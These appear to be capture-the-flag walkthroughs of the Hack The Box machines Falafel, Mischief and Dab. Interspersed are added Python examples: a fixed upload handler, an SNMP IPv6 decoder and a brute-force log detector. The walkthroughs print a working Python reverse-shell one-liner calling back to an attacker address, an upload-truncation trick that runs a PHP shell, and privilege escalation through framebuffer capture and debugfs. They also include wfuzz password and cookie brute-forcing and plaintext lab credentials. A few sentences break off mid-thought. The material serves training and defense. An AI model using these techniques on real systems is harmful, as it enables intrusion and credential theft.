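The bug described above next to a fixed version, as an added example (the site’s own upload code is not on the page, so both functions are assumed stand-ins): the 236-character limit and the .php.png trick are as described, and the set of allowed extensions is an assumption.

```python
"""Upload-name handling that reproduces the falafel bug beside a fixed version.
The vulnerable function validates the extension of the name the client sent and
then truncates the name to 236 characters when storing it, so a 240-character
name ending in ".php.png" is stored ending in ".php"."""
import os
import secrets

MAX_STORED_NAME = 236                            # truncation limit observed on the box
ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}  # assumed allowlist; the page only shows .png accepted


def check_extension(name: str) -> str:
    ext = os.path.splitext(name)[1].lower()
    if ext not in ALLOWED_EXT:
        raise ValueError("Bad extension")
    return ext


def stored_name_vulnerable(client_name: str) -> str:
    """Validates one name and stores another: the check runs before the truncation."""
    check_extension(client_name)
    return client_name[:MAX_STORED_NAME]


def stored_name_fixed(client_name: str) -> str:
    """Never persist the client's basename. Keep only the validated extension,
    generate the rest, and re-check the final name so that no later step
    (truncation, normalisation) can change what the web server will execute."""
    ext = check_extension(client_name)
    final = secrets.token_hex(16) + ext
    if len(final) > MAX_STORED_NAME or os.path.splitext(final)[1] != ext:
        raise RuntimeError("stored name would not match the validated extension")
    return final


def would_execute(stored_name: str) -> bool:
    """What the web server sees: a .php extension on disk is run as code."""
    return os.path.splitext(stored_name)[1].lower() == ".php"


if __name__ == "__main__":
    name = "a" * 232 + ".php.png"                        # 240 characters, as in the write-up
    print(would_execute(stored_name_vulnerable(name)))   # True: stored as aaa....php
    print(would_execute(stored_name_fixed(name)))        # False: stored as <32 hex chars>.png
```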

Let’s prepare a PHP reverse shell with a loooong, loooong file name and host it using python’s SimpleHTTPServer:

Root@kali:~/htb/falafel# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.73 - - [02/Apr/2019 10:10:20] "GET /verylooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.php.png HTTP/1.1" 200 -

Triggering the reverse shell via curl:

root@kali:~/htb/falafel# curl "http://10.10.10.73/uploads/0402-1710_61cb5b7a8480bfc4/verylooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.php"

Netcat listener receiving the reverse shell connection:

root@kali:~/htb/falafel# nc -lvp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.73.
Ncat: Connection from 10.10.10.73:53576.
Linux falafel 4.4.0-112-generic #135-Ubuntu SMP Fri Jan 19 11:48:36 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
17:14:07 up 1 day, 16:59, 2 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
yossi tty1 Mon00 40:59m 0.15s 0.09s -bash
moshe pts/0 10.10.14.20 15:21 1:52m 0.00s 0.00s -sh
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty; pty.spawn('/bin/bash')" 
www-data@falafel:/$

The passwd file shows two system users, yossi and moshe.

www-data@falafel:/$ cd /var/www/html
cd /var/www/html
www-data@falafel:/var/www/html$ ls
ls
assets cyberlaw.txt images login_logic.php style.php
authorized.php footer.php index.php logout.php upload.php
connection.php header.php js profile.php uploads
css icon.png login.php robots.txt
www-data@falafel:/var/www/html$ cat connection.php 
cat connection.php
<?php
define('DB_SERVER', 'localhost:3306');
define('DB_USERNAME', 'moshe');
define('DB_PASSWORD', 'falafelIsReallyTasty');
define('DB_DATABASE', 'falafel');
$db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
// Check connection
if (mysqli_connect_errno())
{
echo "Failed to connect to MySQL: " . mysqli_connect_error();
}
?>
www-data@falafel:/var/www/html$

This is the MySQL connection file of the web app: the username is moshe and the password is falafelIsReallyTasty.

With these credentials we try an SSH login; after logging in successfully we find the user.txt file inside /home/moshe:

PS C:\Users\jacco> ssh moshe@10.10.10.73
moshe@10.10.10.73's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Tue Apr 2 15:21:50 2019 from 10.10.14.20
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
setterm: terminal xterm-256color does not support --blank
moshe@falafel:~$ ls
user.txt
moshe@falafel:~$ cat user.txt
c86*****9d3

After some more enumeration we checked the groups of user moshe and found that the user is in the video group. That is worth checking for privilege escalation, because members of the video group can read the framebuffer device files (/dev/fb*), and a local user who can read a framebuffer sees whatever is currently shown on the console, which can be used to escalate privileges.

Let’s read /dev/fb0 with cat to capture the raw framebuffer data into /tmp as screen.raw.

Now that the raw data is captured in /tmp, we need to convert the raw image into a standard image format such as .png, but before that we need the screen dimensions; the following command prints them:

Now enter the following command to convert the raw data into a .png image:

Opening screen.png gives the following image, which shows the password MoshePlzStopHackingMe! for the user yossi.

With this credential we log in over SSH as yossi. yossi is a member of the disk group, which allows raw reads of the block device, so we use debugfs on /dev/sda1 to read root’s SSH RSA key and root.txt:

PS C:\Users\jacco> ssh yossi@10.10.10.73
yossi@10.10.10.73's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Tue Apr  2 15:16:20 2019 from 10.10.14.20
yossi@falafel:~$ groups
yossi adm disk cdrom dip plugdev lpadmin sambashare
yossi@falafel:~$ debugfs /dev/sda1
debugfs 1.42.13 (17-May-2015)
debugfs:  cat /root/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----
debugfs:  cat /root/root.txt
23b*****fa1
debugfs:

HTB – Mischief

Today we are going to solve another CTF challenge, “Mischief”. Mischief is a retired vulnerable lab presented by Hack the Box to help pentesters practice online penetration testing according to their experience; they have a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Easy

Task: To find user.txt and root.txt file

Let’s start off with an nmap scan with version detection and default scripts to find the open ports and services.

c:\Users\jacco>nmap -sV -sC 10.10.10.92
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-01 08:54 W. Europe Summer Time
Nmap scan report for 10.10.10.92
Host is up (0.028s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2a:90:a6:b1:e6:33:85:07:15:b2:ee:a7:b9:46:77:52 (RSA)
| 256 d0:d7:00:7c:3b:b0:a6:32:b2:29:17:8d:69:a6:84:3f (ECDSA)
|_ 256 3f:1c:77:93:5c:c0:6c:ea:26:f4:bb:6c:59:e9:7c:b0 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.33 seconds

As you can see, we didn’t obtain much information here, so I also scanned UDP ports, and the result shows port 161 (SNMP) open.

c:\Users\jacco>nmap -sU 10.10.10.92
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-01 08:57 W. Europe Summer Time
Nmap scan report for 10.10.10.92
Host is up (0.029s latency).
Not shown: 999 open|filtered ports
PORT STATE SERVICE
161/udp open snmp

Nmap done: 1 IP address (1 host up) scanned in 34.87 seconds

Since SNMP is enabled on the host, I ran the nmap SNMP scripts against it:

root@kali:~/htb/mischief# nmap -p161 -sC -sV -sU 10.10.10.92
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-01 03:03 EDT
Nmap scan report for 10.10.10.92
Host is up (0.028s latency).

PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info: 
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: b6a9f84e18fef95a00000000
| snmpEngineBoots: 19
|_ snmpEngineTime: 9h48m31s
| snmp-interfaces: 
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| Traffic stats: 0.00 Kb sent, 0.00 Kb received
| Intel Corporation 82545EM Gigabit Ethernet Controller (Copper)
| IP address: 10.10.10.92 Netmask: 255.255.255.0
| MAC address: 00:50:56:b9:80:1c (VMware)
| Type: ethernetCsmacd Speed: 1 Gbps
|_ Traffic stats: 2.17 Mb sent, 1.58 Mb received
| snmp-netstat: 
| TCP 0.0.0.0:22 0.0.0.0:0
| TCP 0.0.0.0:3366 0.0.0.0:0
| TCP 10.10.10.92:22 10.10.14.20:15739
| TCP 127.0.0.1:3306 0.0.0.0:0
| TCP 127.0.0.53:53 0.0.0.0:0
| UDP 0.0.0.0:161 *:*
| UDP 0.0.0.0:42621 *:*
|_ UDP 127.0.0.53:53 *:*
| snmp-processes: 
| 1: 
| Name: systemd
| Path: /sbin/init
| Params: maybe-ubiquity
| 2: 
| Name: kthreadd
--snip--
| 591: 
| Name: sh
| Path: /bin/sh
| Params: -c /home/loki/hosted/webstart.sh
| 594: 
| Name: sh
| Path: /bin/sh
| Params: /home/loki/hosted/webstart.sh
| 595: 
| Name: python
| Path: python
| Params: -m SimpleHTTPAuthServer 3366 loki:godofmischiefisloki --dir /home/loki/hosted/
| 617: 
| Name: sshd
| Path: /usr/sbin/sshd
| Params: -D
--snip--
|   zerofree-1.0.4-1; 0-01-01T00:00:00
|_  zlib1g-1:1.2.11.dfsg-0ubuntu2; 0-01-01T00:00:00
Service Info: Host: Mischief

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 114.55 seconds

Hmmm!! Here I found something very interesting: it looks like a credential used for authentication to the service on port 3366.

Let’s navigate to port 3366 in the web browser and enter the following credential:

Username: loki
Password: godofmischiefisloki

We are welcomed by the following web page, which holds another credential. Let’s dig out another way to use this credential for logging in.

We use a python script called Enyx to find the IPv6 address of the target machine through SNMP. You can get the script from this link:

root@kali:/opt# git clone https://github.com/trickster0/Enyx.git
Cloning into 'Enyx'...
remote: Enumerating objects: 70, done.
remote: Total 70 (delta 0), reused 0 (delta 0), pack-reused 70
Unpacking objects: 100% (70/70), done.
root@kali:/opt# cd Enyx/
root@kali:/opt/Enyx# python enyx.py 2c public 10.10.10.92
###################################################################################
#                          SNMP IPv6 Enumerator Tool                              #
#                  Author: Thanasis Tserpelis aka Trickster0                      #
###################################################################################


[+] Snmpwalk found.
Created directory: /var/lib/snmp/mib_indexes
[+] Grabbing IPv6.
[+] Loopback -> 0000:0000:0000:0000:0000:0000:0000:0001
[+] Unique-Local -> dead:beef:0000:0000:0250:56ff:feb9:801c
[+] Link Local -> fe80:0000:0000:0000:0250:56ff:feb9:801c
root@kali:/opt/Enyx#
root@kali:/opt/Enyx# nmap -6 dead:beef:0000:0000:0250:56ff:feb9:801c
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-01 03:07 EDT
Nmap scan report for dead:beef::250:56ff:feb9:801c
Host is up (0.034s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 17.38 seconds
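An added example of where the IPv6 addresses come from (not Enyx’s own code, which may work differently): in IP-MIB the ipAddressTable indexes each row by address type, length and the address octets, so a single snmpwalk of the ipAddressIfIndex column already carries every address the host has. The walk output is constructed inline to match the host above; the only assumption is that the agent populates that table.

```python
"""Decode IPv4/IPv6 addresses from the SNMP ipAddressTable (IP-MIB,
1.3.6.1.2.1.4.34). Every row is indexed by <InetAddressType>.<length>.<octets>,
so an snmpwalk of the ipAddressIfIndex column already contains the addresses."""
import ipaddress
import re

IP_ADDRESS_IF_INDEX = "1.3.6.1.2.1.4.34.1.3"     # ipAddressIfIndex column OID
INET_IPV4, INET_IPV6, INET_IPV6Z = 1, 2, 4        # InetAddressType values handled here

# Constructed `snmpwalk -On` output (numeric OIDs) for a host like the one above.
SAMPLE_WALK = """\
.1.3.6.1.2.1.4.34.1.3.1.4.10.10.10.92 = INTEGER: 2
.1.3.6.1.2.1.4.34.1.3.1.4.127.0.0.1 = INTEGER: 1
.1.3.6.1.2.1.4.34.1.3.2.16.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1 = INTEGER: 1
.1.3.6.1.2.1.4.34.1.3.2.16.222.173.190.239.0.0.0.0.2.80.86.255.254.185.128.28 = INTEGER: 2
.1.3.6.1.2.1.4.34.1.3.2.16.254.128.0.0.0.0.0.0.2.80.86.255.254.185.128.28 = INTEGER: 2
"""

WALK_LINE = re.compile(r"^\.?(?P<oid>[\d.]+)\s*=\s*INTEGER:\s*(?P<value>\d+)\s*$")


def decode_index(index: str):
    """Turn the OID index '<type>.<len>.<octets...>' into an ipaddress object."""
    parts = [int(p) for p in index.split(".")]
    if len(parts) < 2:
        raise ValueError(f"index too short: {index}")
    addr_type, length, octets = parts[0], parts[1], parts[2:]
    if len(octets) != length or any(not 0 <= o <= 255 for o in octets):
        raise ValueError(f"malformed InetAddress index: {index}")
    if addr_type == INET_IPV4 and length == 4:
        return ipaddress.IPv4Address(bytes(octets))
    if addr_type == INET_IPV6 and length == 16:
        return ipaddress.IPv6Address(bytes(octets))
    if addr_type == INET_IPV6Z and length == 20:      # 16 address octets + 4-octet zone index
        return ipaddress.IPv6Address(bytes(octets[:16]))
    raise ValueError(f"unsupported address type/length: {index}")


def scope(addr) -> str:
    """Rough classification so link-local noise is easy to tell from reachable addresses."""
    if addr.is_loopback:
        return "loopback"
    if addr.is_link_local:
        return "link-local"
    if addr.is_private:
        return "private"
    return "global"


def parse_walk(text: str):
    """Return [(address, ifIndex), ...] for every ipAddressIfIndex row in the walk."""
    rows = []
    for line in text.splitlines():
        m = WALK_LINE.match(line)
        if not m or not m.group("oid").startswith(IP_ADDRESS_IF_INDEX + "."):
            continue
        index = m.group("oid")[len(IP_ADDRESS_IF_INDEX) + 1:]
        rows.append((decode_index(index), int(m.group("value"))))
    return rows


if __name__ == "__main__":
    for addr, ifindex in parse_walk(SAMPLE_WALK):
        print(f"ifIndex {ifindex}  {scope(addr):10}  {addr.exploded}")
```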

So we browse to the target’s IPv6 address in the URL bar and get a login page for a command execution panel. We try to log in with the credential we found earlier, but it isn’t valid here.

Access Victim’s Shell

 

Next, I brute-forced the username and successfully logged in with the following combination:

Since it is a command execution panel where we can run arbitrary system commands, this is RCE, which can easily be used to obtain a reverse shell on the target machine.

But before that, you need to know the IPv6 address of your own machine to use as the listening address:

root@kali:/opt/Enyx# ifconfig tun0
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.10.14.20 netmask 255.255.254.0 destination 10.10.14.20
inet6 dead:beef:2::1012 prefixlen 64 scopeid 0x0<global>
inet6 fe80::e0da:8b68:3f37:f906 prefixlen 64 scopeid 0x20<link>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 100 (UNSPEC)
RX packets 131 bytes 61874 (60.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 168 bytes 16553 (16.1 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

For the reverse shell I use the python reverse shell from pentestmonkey, with the listener address changed to our IPv6 address. Since both ends speak IPv6, we need a listener that can accept an IPv6 connection, such as ncat, so we start ncat listening on port 443:

root@kali:~/htb/mischief# nc -6 -lvnp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Connection from dead:beef::250:56ff:feb9:801c.
Ncat: Connection from dead:beef::250:56ff:feb9:801c:42176.
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ python3 -c "import pty; pty.spawn('/bin/bash')" 
www-data@Mischief:/var/www/html$

The python reverse shell:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::1012",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

As soon as we execute the python code we get a reverse connection, either via ncat or via nc6.exe from https://www.sphinx-soft.com/tools/index.html.

Great!! We now have access to a remote terminal, so let’s look for the user.txt file to complete our first task. We found user.txt in /home/loki but were unable to read it. However, there was another interesting file, “credentials”, which holds another credential:

c:\PENTEST>nc6 -lvp 443
listening on [::] 443 ...
Warning: forward host lookup failed for mischief.htb: h_errno 11004: NO_DATA
connect to [dead:beef:2::1012] from mischief.htb [dead:beef::250:56ff:feb9:801c] 42174: NO_DATA
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ python3 -c "import pty; pty.spawn('/bin/bash')"
www-data@Mischief:/var/www/html$ cd /home/loki
cd /home/loki
www-data@Mischief:/home/loki$ ls
ls
credentials hosted user.txt
www-data@Mischief:/home/loki$ cat credentials
cat credentials
pass: lokiisthebestnorsegod

As port 22 is open, we connect to the remote machine through ssh and read user.txt:

PS C:\Users\jacco> ssh loki@10.10.10.92
loki@10.10.10.92's password:lokiisthebestnorsegod
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Tue Apr 2 07:20:54 UTC 2019

System load: 0.0 Processes: 115
Usage of /: 25.9% of 15.68GB Users logged in: 0
Memory usage: 43% IP address for ens33: 10.10.10.92
Swap usage: 0%


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

0 packages can be updated.
0 updates are security updates.


Last login: Mon Apr 1 06:40:22 2019 from 10.10.14.20
loki@Mischief:~$ ls
credentials hosted user.txt
loki@Mischief:~$ cat user.txt
bf5*****060
loki@Mischief:~$ cat .bash_history
python -m SimpleHTTPAuthServer loki:lokipasswordmischieftrickery
exit
free -mt
ifconfig
cd /etc/
sudo su
su
exit
su root
ls -la
sudo -l
ifconfig
id
cat .bash_history
nano .bash_history
exit
find / -name root.txt
whoami
groups
su
exit
loki@Mischief:~$ su
-bash: /bin/su: Permission denied

While exploring further, I found the .bash_history file, which contains one more credential, for the root user, but loki doesn’t have permission to execute su.

Therefore we go back to the www-data shell to run su and enter the password found above for the root login. There was no flag inside the root directory, so we used find to locate root.txt:

www-data@Mischief:/var/www/html$ su
su
Password: lokipasswordmischieftrickery

root@Mischief:/var/www/html# find / -name root.txt
find / -name root.txt
/usr/lib/gcc/x86_64-linux-gnu/7/root.txt
/root/root.txt
root@Mischief:/var/www/html# cat /usr/lib/gcc/x86_64-linux-gnu/7/root.txt
cat /usr/lib/gcc/x86_64-linux-gnu/7/root.txt
ae1*****807

Author: Jacco Straathof

HTB – Dab

Today we are going to solve another CTF challenge, “Dab”. It is a retired vulnerable lab presented by Hack the Box to help pentesters practise online penetration testing according to their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Expert

Task: To find user.txt and root.txt file

Let’s start off with our basic Nmap command to find out the open ports and services.

root@kali:~/htb/dab# nmap -sC -sV -oA nmap 10.10.10.86
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-27 10:14 EDT
Nmap scan report for 10.10.10.86
Host is up (0.029s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 8803 Mar 26 2018 dab.jpg
| ftp-syst: 
| STAT: 
| FTP server status:
| Connected to ::ffff:10.10.14.20
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 20:05:77:1e:73:66:bb:1e:7d:46:0f:65:50:2c:f9:0e (RSA)
| 256 61:ae:15:23:fc:bc:bc:29:13:06:f2:10:e0:0e:da:a0 (ECDSA)
|_ 256 2d:35:96:4c:5e:dd:5c:c0:63:f0:dc:86:f1:b1:76:b5 (ED25519)
80/tcp open http nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
| http-title: Login
|_Requested resource was http://10.10.10.86/login
8080/tcp open http nginx 1.10.3 (Ubuntu)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Internal Dev
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.85 seconds

The Nmap scan shows four open ports: 21 (FTP), 22 (SSH), 80 (HTTP) and 8080 (HTTP).

As port 21 is open, we access it using FTP and find a JPG file. We download it to our system to find more information about the image file.

We use a tool called “steghide” to check whether a file is hidden inside the image and find a hidden text file called “dab.txt”. We extract and open it, but it turns out to be a dead end.

steghide --info dab.jpg
steghide extract -sf dab.jpg -xf dab.txt

Port 80 serves a login form:

root@kali:~/htb/dab# curl -s 'http://10.10.10.86/login'
<html>
<head>
<title>Login</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
<body>
<div class="container">
<h1>Please login</h1>
<form action="" method="post">
<input type="text" placeholder="Username" name="username">
<input type="password" placeholder="Password" name="password">
<input type="submit" name="submit" value="Login">
</form>

</div>
</body>
</html>

Port 8080 is also running HTTP. When we try to access the web service, we get an error saying that the authentication cookie is not set.

root@kali:~/htb/dab# curl -s 'http://10.10.10.86:8080'
<!DOCTYPE html>
<html lang="en">
<head>
<title>Internal Dev</title>
<meta charset="UTF-8">
<meta name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=no, width=device-width">
</head>
<body>
<div class="container wrapper">

Access denied: password authentication cookie not set

</div>
</body>
</html>

The request to http://10.10.10.86/login is captured in Burp Suite and parameters examined.

Wfuzz is used to brute-force the admin password. Incorrect responses are 18 lines long, so they are hidden from the output with --hl=18.

root@kali:~/htb/dab# wfuzz -c --hl=18 -w /usr/share/SecLists/Passwords/darkweb2017-top1000.txt -d 'username=admin&password=FUZZ&submit=Login' http://10.10.10.86/login

********************************************************
* Wfuzz 2.3.3 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.86/login
Total requests: 1000

==================================================================
ID Response Lines Word Chars Payload 
==================================================================

000277: C=500 4 L 40 W 291 Ch "������"
000523: C=302 3 L 24 W 209 Ch "Password1"
000627: C=500 4 L 40 W 291 Ch "�������"
000705: C=500 4 L 40 W 291 Ch "��������"

Total time: 5.121295
Processed Requests: 1000
Filtered Requests: 996
Requests/sec.: 195.2630

We find the correct username and password to be “admin: Password1”.

We could also

Fuzzing with ZAP

The first thing to mention is the wordlist: because we are brute-forcing remotely, it is better to use a small wordlist, so we won’t use rockyou here. I used darkweb2017-top10000.txt from SecLists.

Let’s start ZAP and intercept the request again.
Then right-click –> Attack –> Fuzzer. After that we highlight the place we want to fuzz, which is the password parameter value. Add –> Add, then we paste the wordlist content.

We are still not able to access the web application on port 8080, as it still shows the same cookie error, so we brute-force the cookie name using Burp Suite.

Using “rockyou.txt” as the wordlist, we find that the cookie is called “password”. We also get a different error, stating that the password authentication cookie is incorrect.

We use wfuzz to brute-force the value of the “password” cookie and find it to be “secret”.

root@kali:~/htb/dab# wfuzz -u http://10.10.10.86:8080/ --hl=14 -w /usr/share/SecLists/Passwords/darkweb2017-top10000.txt -b password=FUZZ

********************************************************
* Wfuzz 2.3.3 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.86:8080/
Total requests: 10000

==================================================================
ID Response Lines Word Chars Payload 
==================================================================

000211: C=200 21 L 48 W 540 Ch "secret"
003640: C=200 14 L 29 W 324 Ch "123456v"^C
Finishing pending requests...
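Both wfuzz runs above (the form brute force against /login and the cookie brute force against port 8080, and the port sweep of the socket endpoint further down works the same way) leave an obvious trace in the web server's access log: tens of requests per minute from one client to one path. The cookie value itself is not written to a standard nginx log, so what gives that run away is volume plus the one reply whose size differs from the rest. The detector below is an added example of mine, not part of the writeup; the log lines are constructed to mirror the two runs and the "combined" log format is assumed.

```python
import re
from collections import defaultdict

# nginx "combined" format: remote_addr - remote_user [time_local] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+|-)'
)


def build_sample_log():
    """Constructed access-log lines (not from the box) mirroring the two wfuzz runs."""
    lines = []
    # 40 POSTs to /login within one minute; one guess is accepted (302 redirect, 209 bytes)
    for i in range(40):
        status, size = ("302", "209") if i == 23 else ("200", "1088")
        lines.append(f'10.10.14.20 - - [27/Mar/2019:10:20:{i:02d} -0400] '
                     f'"POST /login HTTP/1.1" {status} {size} "-" "Wfuzz/2.3.3"')
    # 30 GETs to / on the dev vhost with varying cookie values; the cookie is not logged,
    # so only the request volume gives this one away
    for i in range(30):
        lines.append(f'10.10.14.20 - - [27/Mar/2019:10:21:{i:02d} -0400] '
                     f'"GET / HTTP/1.1" 200 324 "-" "Wfuzz/2.3.3"')
    # ordinary traffic from another client
    lines.append('10.10.14.7 - - [27/Mar/2019:10:20:05 -0400] "GET /login HTTP/1.1" 200 1088 "-" "Mozilla/5.0"')
    lines.append('10.10.14.7 - - [27/Mar/2019:10:20:09 -0400] "POST /login HTTP/1.1" 302 209 "-" "Mozilla/5.0"')
    return lines


def find_bursts(lines, threshold=20):
    """Group requests by (ip, method, path, minute) and report buckets at or above threshold.

    Each reported bucket maps to (request_count, outlier_sizes): response sizes seen exactly
    once in the bucket. Against a wall of identical failures, the single different reply is
    usually the accepted guess, which is what the analyst wants to look at first."""
    buckets = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip unparsable lines rather than crash on them
        minute = m["ts"][:17]  # '27/Mar/2019:10:20:31 -0400' -> '27/Mar/2019:10:20'
        buckets[(m["ip"], m["method"], m["path"], minute)].append(m["size"])
    report = {}
    for key, sizes in buckets.items():
        if len(sizes) >= threshold:
            outliers = sorted(s for s in set(sizes) if sizes.count(s) == 1)
            report[key] = (len(sizes), outliers)
    return report


if __name__ == "__main__":
    for (ip, method, path, minute), (count, outliers) in find_bursts(build_sample_log()).items():
        print(f"{minute} {ip} {method} {path}: {count} requests, outlier sizes {outliers}")
```

The per-minute bucket is deliberately crude; the point is that a threshold on (client, path) request rate catches all three fuzzing runs on this box without needing to see the guessed values, and rate limiting or lockout on /login would have stopped the first one outright.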

Using Burp Suite we set the cookie and are now able to access the page. It is a web application that sends a line of text to a chosen TCP port.

Memcached

Using this page, I was able to enumerate a further local service listening on 11211/tcp (memcached). It is easy: any port that is not listening results in a response code of 500 (INTERNAL SERVER ERROR). Again, we use wfuzz, hiding the 500 responses with --hc=500.

root@kali:~/htb/dab# wfuzz -c -z range,1-65535 -u 'http://10.10.10.86:8080/socket?port=FUZZ&cmd=puck' -H "Cookie: password=secret" --hc=500

********************************************************
* Wfuzz 2.3.3 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.86:8080/socket?port=FUZZ&cmd=abc
Total requests: 65535

==================================================================
ID Response Lines Word Chars Payload 
==================================================================

000021: C=200 28 L 61 W 627 Ch "21"
000022: C=200 28 L 55 W 629 Ch "22"
000080: C=200 40 L 84 W 1010 Ch "80"
008080: C=200 40 L 84 W 1010 Ch "8080"
011211: C=200 27 L 52 W 576 Ch "11211"
011488: C=500 4 L 40 W 291 Ch "11488"^C
Finishing pending requests...

Port 11211 is Memcached, so we send the version command to check the server version.

root@kali:~/htb/dab# curl -s 'http://10.10.10.86:8080/socket?port=11211&cmd=version'
<!DOCTYPE html>
<html lang="en">
<head>
<title>Internal Dev</title>
<meta charset="UTF-8">
<meta name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=no, width=device-width">
</head>
<body>
<div class="container wrapper">

<p>Status of cache engine: Online</p>
<h4>TCP socket test</h4>
<form action="/socket">
<input type="text" name="port" placeholder="TCP port"></input>
<input type="text" name="cmd" placeholder="Line to send..."></input>
<input type="submit" value="Submit"</input>
</form>

<p>Output</p>
<pre>
VERSION 1.4.25 Ubuntu

</pre>


</div>
</body>
</html>

We successfully get the version of the Memcached server: 1.4.25.

Next, let’s find out which characters are blacklisted by the socket endpoint. The normal response for port 80 has 84 words, so it is hidden with --hw=84 and what remains are the characters that produce a different, shorter response:

root@kali:~/htb/dab# wfuzz -c --hw=84 -w /usr/share/SecLists/Fuzzing/alphanum-case-extra.txt -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=80&cmd=FUZZ'

********************************************************
* Wfuzz 2.3.3 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.86:8080/socket?port=80&cmd=FUZZ
Total requests: 95

==================================================================
ID Response Lines Word Chars Payload 
==================================================================

000001: C=200 14 L 27 W 303 Ch "!"
000002: C=200 14 L 27 W 303 Ch """
000003: C=200 14 L 25 W 287 Ch "#"
000004: C=200 14 L 27 W 303 Ch "$"
000007: C=200 14 L 27 W 303 Ch "'"
000008: C=200 14 L 27 W 303 Ch "("
